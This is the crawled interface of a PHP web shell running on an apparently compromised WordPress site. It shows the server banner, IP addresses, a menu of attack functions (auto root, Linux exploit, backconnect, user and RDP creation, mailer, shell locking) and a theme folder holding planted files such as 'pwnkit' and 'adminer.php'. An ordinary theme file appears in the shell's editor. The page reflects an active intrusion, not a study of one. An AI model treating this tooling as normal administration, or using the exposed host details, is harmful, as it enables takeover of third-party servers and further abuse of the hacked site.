Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
sydney /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
upsell
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
custom-header.php
3.21
KB
-rw-r--r--
customizer.php
53.45
KB
-rw-r--r--
extras.php
1.86
KB
-rw-r--r--
jetpack.php
392
B
-rw-r--r--
page-builder.php
6.94
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
slider.php
8.03
KB
-rw-r--r--
styles.php
11.22
KB
-rw-r--r--
template-tags.php
9.23
KB
-rw-r--r--
theme-info.php
1.61
KB
-rw-r--r--
woocommerce.php
3.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom-header.php
<?php /** * Sample implementation of the Custom Header feature * http://codex.wordpress.org/Custom_Headers * * You can add an optional custom header image to header.php like so ... <?php if ( get_header_image() ) : ?> <a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"> <img src="<?php header_image(); ?>" width="<?php echo esc_attr( get_custom_header()->width ); ?>" height="<?php echo esc_attr( get_custom_header()->height ); ?>" alt=""> </a> <?php endif; // End header image check. ?> * * @package Sydney */ /** * Set up the WordPress core custom header feature. * * @uses sydney_header_style() * @uses sydney_admin_header_style() * @uses sydney_admin_header_image() */ function sydney_custom_header_setup() { add_theme_support( 'custom-header', apply_filters( 'sydney_custom_header_args', array( 'default-image' => get_template_directory_uri() . '/images/header.jpg', 'default-text-color' => '000000', 'width' => 1920, 'height' => 600, 'flex-height' => true, 'wp-head-callback' => 'sydney_header_style', 'admin-head-callback' => 'sydney_admin_header_style', 'admin-preview-callback' => 'sydney_admin_header_image', ) ) ); } add_action( 'after_setup_theme', 'sydney_custom_header_setup' ); if ( ! function_exists( 'sydney_header_style' ) ) : /** * Styles the header image and text displayed on the blog * * @see sydney_custom_header_setup(). */ function sydney_header_style() { if ( get_header_image() && ( get_theme_mod('front_header_type') == 'image' && is_front_page() || get_theme_mod('site_header_type', 'image') == 'image' && !is_front_page() ) ) { ?> <style type="text/css"> .header-image { background-image: url(<?php echo get_header_image(); ?>); display: block; } @media only screen and (max-width: 1024px) { .header-inner { display: block; } .header-image { background-image: none; height: auto !important; } } </style> <?php } } endif; // sydney_header_style if ( ! function_exists( 'sydney_admin_header_style' ) ) : /** * Styles the header image displayed on the Appearance > Header admin panel. * * @see sydney_custom_header_setup(). */ function sydney_admin_header_style() { ?> <style type="text/css"> .appearance_page_custom-header #headimg { border: none; } #headimg h1, #desc { } #headimg h1 { } #headimg h1 a { } #desc { } #headimg img { } </style> <?php } endif; // sydney_admin_header_style if ( ! function_exists( 'sydney_admin_header_image' ) ) : /** * Custom header image markup displayed on the Appearance > Header admin panel. * * @see sydney_custom_header_setup(). */ function sydney_admin_header_image() { $style = sprintf( ' style="color:#%s;"', get_header_textcolor() ); ?> <div id="headimg"> <h1 class="displaying-header-text"><a id="name"<?php echo $style; ?> onclick="return false;" href="<?php echo esc_url( home_url( '/' ) ); ?>"><?php bloginfo( 'name' ); ?></a></h1> <div class="displaying-header-text" id="desc"<?php echo $style; ?>><?php bloginfo( 'description' ); ?></div> <?php if ( get_header_image() ) : ?> <img src="<?php header_image(); ?>" alt=""> <?php endif; ?> </div> <?php } endif; // sydney_admin_header_image
Close